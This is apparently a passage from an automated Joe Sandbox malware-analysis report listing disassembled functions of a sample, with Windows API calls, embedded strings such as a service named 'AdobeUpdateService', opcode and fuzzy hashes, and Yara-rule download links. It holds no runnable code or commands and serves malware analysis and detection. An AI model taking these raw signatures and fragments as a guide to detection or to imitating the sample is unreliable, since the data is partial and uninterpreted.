                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                                                                                                                    • String ID: All pipes closed properly.$CommBridge$Inside closeBridge$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 528846559-1211123791
                                                                                                                                                                                                                                                                    • Opcode ID: 1f3c2fab79f574a5bc492b236c571b4ebadb7da9787cdc0bcc3f81ec269f5a84
                                                                                                                                                                                                                                                                    • Instruction ID: c28e8b6ec9cc632472ca235f45b3f8d0a108cff224a1436875239388707932b2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f3c2fab79f574a5bc492b236c571b4ebadb7da9787cdc0bcc3f81ec269f5a84
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3421D330B40321A7CA20EF268C56F873B54AF12F11F240577B806A72D0CEACF99187AD
                                                                                                                                                                                                                                                                    Function 0048857A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00488689,0040B377,?,00000000,?,?,?,004888B3,00000022,FlsSetValue,004A3F04,004A3F0C,?), ref: 0048863B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                    • Opcode ID: 11c0850fd9dd82efe467599ba98e49e0b0b665d46b4f2ea3fd8847a1b3d20761
                                                                                                                                                                                                                                                                    • Instruction ID: 0d18bb84f8fc76a6c3da93e18ff47703567a800fd64ff94e1cc0b507c8cbf4c8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11c0850fd9dd82efe467599ba98e49e0b0b665d46b4f2ea3fd8847a1b3d20761
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C21C331A01221ABCB21AB259C41A9F37589B51760F64096BE906B7390EF38ED00CBDD
                                                                                                                                                                                                                                                                    Function 00427260 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?,0040653E), ref: 0042726E
                                                                                                                                                                                                                                                                    • PathIsDirectoryW.SHLWAPI(?,?,0040653E), ref: 00427283
                                                                                                                                                                                                                                                                    • SHCreateDirectoryExW.SHELL32(00000000,?,00000000,?,?,0040653E), ref: 0042729D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DirectoryPath$CreateExistsFile
                                                                                                                                                                                                                                                                    • String ID: FileUtils$OOBEUtils$SHCreateDirectoryEx failed. Error: %d
                                                                                                                                                                                                                                                                    • API String ID: 3984196470-716391998
                                                                                                                                                                                                                                                                    • Opcode ID: e2f3c0152dea6573d78a5f9b5d09177c3ec5f57044b8f182ed452466184478f4
                                                                                                                                                                                                                                                                    • Instruction ID: 1c360898109e8edf91c6b2f0d6b286c19c2d4d721b312238894a1274079c5597
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2f3c0152dea6573d78a5f9b5d09177c3ec5f57044b8f182ed452466184478f4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0119B3174522097CA249B55BD4AF4B3758AFC2F51B5504ABFC4557391CA68AC40CABC
                                                                                                                                                                                                                                                                    Function 004151D0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 004151DB
                                                                                                                                                                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000,?,00414C7F,?), ref: 004151E9
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 004151F7
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 00415205
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 00415212
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00414C7F,?), ref: 00415226
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 0041523F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle$BlockDestroyEnvironment
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1096182194-0
                                                                                                                                                                                                                                                                    • Opcode ID: e2e22a70dbd95b21f456f59282a0213a811955f47d7c623cdfc0833d9dcf18cc
                                                                                                                                                                                                                                                                    • Instruction ID: 34402626d38a9728df7e9b11658db42f6f8f7e161e27eba0645d41ce3f5bf331
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2e22a70dbd95b21f456f59282a0213a811955f47d7c623cdfc0833d9dcf18cc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5501D371B00B11EBDB209F76EC48B9777ECBF54B41304493AB956E3650EA78E8408A69
                                                                                                                                                                                                                                                                    Function 0041FB30 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 84COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0041FAA0,00000000,00000008,00405984), ref: 0041FBA7
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,0041FAA0,00000000,00000008,00405984), ref: 0041FC27
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                    • String ID: Closing inPipe %p$Closing outPipe %p$CommBridge$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 2962429428-1143323105
                                                                                                                                                                                                                                                                    • Opcode ID: 2a3135dafd0f9304286105df91380c5b5f1a53f32146d0c127ed63ac37bcf816
                                                                                                                                                                                                                                                                    • Instruction ID: 0f7ac151626cc6776e72673ec142dc1ae90cb188b2ca2df04446cdc6e3645632
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a3135dafd0f9304286105df91380c5b5f1a53f32146d0c127ed63ac37bcf816
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C421F630740311A7CA20EF259D66F9B3654BB41B00F14017BF912A72E1CBACBD5286ED
                                                                                                                                                                                                                                                                    Function 004018B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RegisterServiceCtrlHandlerW.ADVAPI32(AdobeUpdateService,00401DB0), ref: 00401942
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004019A0
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: SetServiceStatus.ADVAPI32(004C8C64), ref: 00401821
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: GetLastError.KERNEL32 ref: 00401877
                                                                                                                                                                                                                                                                      • Part of subcall function 00401A30: GetLastError.KERNEL32(00000000,00000001,?,00401A1C), ref: 00401AC7
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ServiceMain: Started, xrefs: 00401922
                                                                                                                                                                                                                                                                    • AdobeUpdateService, xrefs: 0040193D
                                                                                                                                                                                                                                                                    • ServiceMain: Failed to register the service with Register Service Control Handler with %d, xrefs: 004019A7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$Service$CtrlHandlerRegisterStatus
                                                                                                                                                                                                                                                                    • String ID: AdobeUpdateService$ServiceMain: Failed to register the service with Register Service Control Handler with %d$ServiceMain: Started
                                                                                                                                                                                                                                                                    • API String ID: 125077777-3162937321
                                                                                                                                                                                                                                                                    • Opcode ID: b74a3c793bce63fd3287ecdf9c99267635b26962f32db75fa19738fde18ddafd
                                                                                                                                                                                                                                                                    • Instruction ID: a0a6ef52c26ab5d4a2a010d99244e849a5362b380fe035aef843cf64b66cd91c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b74a3c793bce63fd3287ecdf9c99267635b26962f32db75fa19738fde18ddafd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25311171A40215ABE300DF6AED46B5A77A4EB55714F14423FE804A73D0EFB86904CBA9
                                                                                                                                                                                                                                                                    Function 0040B280 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70synchronizationCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,?,?,?,?,00404417,000000FF,000000FF,?,?), ref: 0040B317
                                                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?,?,?,00404417,000000FF,000000FF,?,?), ref: 0040B32E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: EventObjectResetSingleWait
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in WaitforEvent $OOBEEvents$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 3162950495-832234452
                                                                                                                                                                                                                                                                    • Opcode ID: c206187707b054cee0fab18e90408e3dcbedc60c60ed156cedcffc0df12259e5
                                                                                                                                                                                                                                                                    • Instruction ID: ed9a0f1cae05966dad16be02516542e9fa838564d8aed4eb53f716a594107257
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c206187707b054cee0fab18e90408e3dcbedc60c60ed156cedcffc0df12259e5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C11108317802155BEB208B599C47B5A7748EB01B31F6407BBFC69E72D0CB65AC1046DC
                                                                                                                                                                                                                                                                    Function 00403E40 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Event
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in SetEvnt $OOBEEvents$OOBEUtils$readDataCallBack : Setting event for read data callback
                                                                                                                                                                                                                                                                    • API String ID: 4201588131-2675428969
                                                                                                                                                                                                                                                                    • Opcode ID: 8d0fe7199531401063d2ff202e2e47731f7e3bb82e1b5197b15312e4f729c641
                                                                                                                                                                                                                                                                    • Instruction ID: 4701acb43a26968b7f86df0609fe2f1396b750fb55ec2d1e5461187ebc36528e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d0fe7199531401063d2ff202e2e47731f7e3bb82e1b5197b15312e4f729c641
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7101A532780224ABC6109B59EC42A5B7B5CEF65B137140077FA09A72D0CB7ABD508BED
                                                                                                                                                                                                                                                                    Function 00403EF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,BB40E64E,00000000,00000008,00000000,00497500,000000FF,?,004059AA), ref: 00403F86
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2680669468.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2680418925.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681117742.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681408086.00000000004C4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000658000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.0000000000663000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.000000000066B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2681519347.00000000006A8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
